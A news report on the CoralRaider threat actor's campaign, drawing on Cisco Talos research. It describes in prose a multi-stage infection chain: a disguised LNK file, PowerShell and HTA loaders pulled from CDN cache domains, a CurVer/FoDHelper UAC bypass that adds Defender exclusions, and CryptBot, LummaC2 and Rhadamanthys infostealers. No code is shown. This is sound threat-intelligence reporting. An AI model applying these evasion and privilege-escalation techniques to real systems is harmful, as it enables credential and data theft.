CoralRaider, an emerging threat actor discovered this month, is running a new campaign to spread infostealing malware by abusing content delivery network (CDN) cache domains.
The threat actor has also expanded its victim base to United States targets and is leveraging new infostealer variants to target password managers and authentication apps, and better evade detection.
Cisco Talos discovered the campaign, which has been ongoing since at least February, and revealed details about CoralRaider’s latest tactics in a blog post Tuesday.
Telemetry and open-source intelligence (OSINT) data shows that the suspected Vietnam-based cybergang has expanded its victimology from mostly Asian targets to targets spanning five continents.
Countries with affected users include the United States, Ecuador, Nigeria and the United Kingdom, among several others; Cisco Talos said users from Japanese computer service call center organizations and Syrian civil defense service organizations were also among the victims.
Malicious CDN download servers up efficiency and evasion
The CoralRaider campaign aims to spread the CryptBot, Rhadamanthys and LummaC2 infostealers in a multi-stage infection chain that uses a malicious Windows Shortcut (LNK) file as the initial attack vector and CDN cache domains as download servers.
The Cisco Talos researchers say the initial LNK file is likely spread through phishing emails directing victims to a site that performs a drive-by download of a ZIP file containing the shortcut. The infection chain is initiated when the target opens the shortcut, which is disguised as a movie file.
The LNK file is embedded with a PowerShell command that uses Get-ItemProperty to locate the Windows program mshsta.exe and uses it to run an HTML application (HTA) file stored on the attacker’s CDN domain.
This HTA file executes a JavaScript code that decodes and triggers a PowerShell decryptor that then decrypts an embedded PowerShell loader script and runs it in memory. This loader drops and executes two batch scripts – one that adds the victim’s “ProgramData” folder to the Windows Defender exclusion list and another that retrieves and runs the infostealer payloads from the CoralRaider’s CDN domain.
The first batch script bypasses User Access Controls (UAC) to configure the Windows Defender exclusion list by manipulating the default Windows registry key CurVer to reference an attacker-created Programmatic Identifier (ProgID) called ServiceHostXGRT. This tactic allows the attacker’s command to be executed with elevated privileges by the Windows FoDHelper.exe program without alerting the user.
The use of a CDN cache domain as a download server serves to improve both the efficiency and stealth of the infection chain. CDN caches are designed to reduce latency by loading content from servers closest to the user, which is ideal for services such as video streaming. When leveraged by attackers, CDNs can help infect targets in more diverse geographical locations without request delays. CDN traffic is also less likely to be scrutinized by network defenses due to the large volume of benign traffic that typically comes from these domains.
Juniper Threat Labs previously reported on campaigns abusing CDNs to spread RedLine Stealer and the LuminosityLink Remote Access Trojan (RAT), noting that servers from a range of CDN providers including Amazon CloudFront, Cloudflare, Google Firebase and Microsoft Azure have been linked to malware.
CoralRaider leverages upgraded CryptBot, LummaC2 stealers
The three infostealer payloads used by CoralRaider – CryptBot, LummaC2 and Rhadamanthys – are used to collect data such as credentials, system and browser data, financial information and cryptocurrency wallets, and exfiltrate it to the attacker’s command-and-control (C2) servers.
The CryptBot variant used in the recent campaign, which first emerged in January 2024, incorporates new methods to obstruct malware analysis, including the use of VMProtect v2.0.3-2.13.
Additionally, this variant now includes password managers and authenticator apps in its targeted applications, such as KeePass, Authy and Google Authenticator, which could enable the threat actors to access wallets and accounts that have two-factor authentication enabled.
The LummaC2 version observed in this campaign is also a new variant that appears to have been customized by the attacker, with a previously unseen obfuscation algorithm used to obfuscate the malware code.
The LummaC2 variant also attempts to connect to nine different C2 servers one by one, and different samples of the malware examined by Cisco Talos were found to each use different keys to encrypt the C2 communication.
Rhadamanthys v0.5.0 variant was also used the campaign, although the most recent version of the popular infostealer is v0.6.0, released February 2024. The researchers found evidence that the threat actor is attempting to further develop the Python script to include the ability for Rhadamanthys to execute a shellcode.